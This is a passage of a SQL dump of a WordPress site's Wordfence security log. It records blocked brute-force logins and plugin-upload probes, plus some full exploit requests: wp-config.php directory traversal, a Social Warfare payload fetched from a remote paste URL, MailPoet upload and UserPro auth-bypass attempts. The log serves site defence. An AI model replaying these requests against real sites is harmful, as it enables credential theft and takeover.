Network',NULL),(11480,1630933834.119028,1630933834.020300,'\0\0\0\0\0\0\0\0\0\0���6�J',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11481,0.000000,1630933895.878321,'\0\0\0\0\0\0\0\0\0\0���7o\r',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11482,0.000000,1630934167.710215,'\0\0\0\0\0\0\0\0\0\0���r��',0,200,0,1,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','loginFailValidUsername',NULL,NULL),(11483,0.000000,1630934800.397694,'\0\0\0\0\0\0\0\0\0\0���a�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11484,0.000000,1630935614.747481,'\0\0\0\0\0\0\0\0\0\0���1L',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11485,0.000000,1630936432.894163,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11486,0.000000,1630937255.568811,'\0\0\0\0\0\0\0\0\0\0��(r��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11487,0.000000,1630938084.844290,'\0\0\0\0\0\0\0\0\0\0����}',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11488,0.000000,1630939744.325703,'\0\0\0\0\0\0\0\0\0\0��]qo6',0,200,0,1,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(11489,0.000000,1630940577.792252,'\0\0\0\0\0\0\0\0\0\0��h�\Z',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11490,0.000000,1630941405.170940,'\0\0\0\0\0\0\0\0\0\0���Avv',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11491,0.000000,1630942225.538887,'\0\0\0\0\0\0\0\0\0\0��mW�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11492,0.000000,1630942754.130918,'\0\0\0\0\0\0\0\0\0\0����S',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11493,1630942755.650766,1630942755.556200,'\0\0\0\0\0\0\0\0\0\0����S',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11494,1630943060.664595,1630943060.545700,'\0\0\0\0\0\0\0\0\0\0����S',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(11495,0.000000,1630943883.008711,'\0\0\0\0\0\0\0\0\0\0���n��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11496,0.000000,1630945550.014419,'\0\0\0\0\0\0\0\0\0\0��T��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11497,0.000000,1630946375.759018,'\0\0\0\0\0\0\0\0\0\0��ν',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11498,0.000000,1630946438.253614,'\0\0\0\0\0\0\0\0\0\0��Q.߀',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11499,0.000000,1630947206.148097,'\0\0\0\0\0\0\0\0\0\0��_�� ',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11500,0.000000,1630948031.494184,'\0\0\0\0\0\0\0\0\0\0��.�`S',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11501,0.000000,1630948858.352501,'\0\0\0\0\0\0\0\0\0\0��-�M^',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11502,0.000000,1630949681.308617,'\0\0\0\0\0\0\0\0\0\0��.��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11503,0.000000,1630950514.263961,'\0\0\0\0\0\0\0\0\0\0���)z�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11504,0.000000,1630951351.607491,'\0\0\0\0\0\0\0\0\0\0��R@�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11505,0.000000,1630951449.578726,'\0\0\0\0\0\0\0\0\0\0���6�E',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11506,1630951451.258344,1630951451.178000,'\0\0\0\0\0\0\0\0\0\0���6�E',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11507,0.000000,1630952189.343687,'\0\0\0\0\0\0\0\0\0\0��D��U',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11508,0.000000,1630952336.059079,'\0\0\0\0\0\0\0\0\0\0���6�<',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11509,1630952338.962189,1630952338.845300,'\0\0\0\0\0\0\0\0\0\0���6�<',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11510,0.000000,1630953012.154574,'\0\0\0\0\0\0\0\0\0\0��E�φ',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11511,0.000000,1630953844.138038,'\0\0\0\0\0\0\0\0\0\0���)z�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11512,0.000000,1630954685.794231,'\0\0\0\0\0\0\0\0\0\0���]�_',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11513,0.000000,1630955524.130115,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11514,0.000000,1630956356.610697,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11515,0.000000,1630957193.635303,'\0\0\0\0\0\0\0\0\0\0����s�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11516,0.000000,1630960353.021020,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11517,1630960356.628047,1630960356.499700,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11518,0.000000,1630960780.301488,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11519,1630960781.635076,1630960781.557800,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11520,1630970194.749354,1630970194.630300,'\0\0\0\0\0\0\0\0\0\0��-�S#',0,403,0,0,0,'https://www.bournesociety.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(11521,1630970206.201641,1630970206.120900,'\0\0\0\0\0\0\0\0\0\0��-�S#',0,403,0,0,0,'https://www.bournesociety.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(11522,1630970203.060335,1630970202.987700,'\0\0\0\0\0\0\0\0\0\0��-�S#',0,403,0,0,0,'https://www.bournesociety.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(11523,1630970229.070475,1630970228.967200,'\0\0\0\0\0\0\0\0\0\0��-�S#',0,403,0,0,0,'https://www.bournesociety.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(11524,1630970295.926033,1630970295.855900,'\0\0\0\0\0\0\0\0\0\0��-�S#',0,403,0,0,0,'https://www.bournesociety.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(11525,0.000000,1630974777.135899,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11526,1630974779.066912,1630974778.978900,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11527,0.000000,1630974950.792770,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11528,1630974952.129626,1630974952.052000,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11529,0.000000,1630984565.613810,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11530,1630984567.120273,1630984567.044500,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11531,0.000000,1630985147.750705,'\0\0\0\0\0\0\0\0\0\0����S',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11532,1630985149.267432,1630985149.180300,'\0\0\0\0\0\0\0\0\0\0����S',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11533,0.000000,1630994848.555218,'\0\0\0\0\0\0\0\0\0\0��h�I\r',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','https://www.google.com/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15','loginFailInvalidUsername',NULL,NULL),(11534,0.000000,1630995469.846181,'\0\0\0\0\0\0\0\0\0\0���[K	',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11535,0.000000,1630995503.677308,'\0\0\0\0\0\0\0\0\0\0���*',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11536,0.000000,1630997495.018093,'\0\0\0\0\0\0\0\0\0\0��r��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11537,0.000000,1630997497.952651,'\0\0\0\0\0\0\0\0\0\0��˖0v',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11538,0.000000,1630998491.902034,'\0\0\0\0\0\0\0\0\0\0���;��',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(11539,0.000000,1630998523.662130,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11540,0.000000,1630999285.389929,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11541,0.000000,1630999292.716122,'\0\0\0\0\0\0\0\0\0\0����zX',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11542,0.000000,1630999510.826200,'\0\0\0\0\0\0\0\0\0\0���6�K',0,200,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11543,0.000000,1630999727.641548,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11544,1630999730.123973,1630999730.031300,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11545,0.000000,1631000027.659981,'\0\0\0\0\0\0\0\0\0\0���ŃB',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11546,0.000000,1631000040.645280,'\0\0\0\0\0\0\0\0\0\0���q�u',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11547,0.000000,1631000727.236725,'\0\0\0\0\0\0\0\0\0\0��e >�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11548,0.000000,1631000757.885096,'\0\0\0\0\0\0\0\0\0\0���;=�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11549,0.000000,1631001515.188670,'\0\0\0\0\0\0\0\0\0\0�����f',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11550,0.000000,1631001537.273859,'\0\0\0\0\0\0\0\0\0\0��gyY�',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(11551,0.000000,1631002374.880132,'\0\0\0\0\0\0\0\0\0\0���\n',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11552,0.000000,1631002400.482775,'\0\0\0\0\0\0\0\0\0\0��[��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11553,0.000000,1631003324.850549,'\0\0\0\0\0\0\0\0\0\0��k�X�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11554,0.000000,1631003340.849016,'\0\0\0\0\0\0\0\0\0\0���#y�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11555,0.000000,1631004310.179528,'\0\0\0\0\0\0\0\0\0\0��ms��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11556,0.000000,1631004317.401501,'\0\0\0\0\0\0\0\0\0\0��3Y��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11557,0.000000,1631005331.120446,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11558,0.000000,1631005339.618584,'\0\0\0\0\0\0\0\0\0\0��g|]�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux 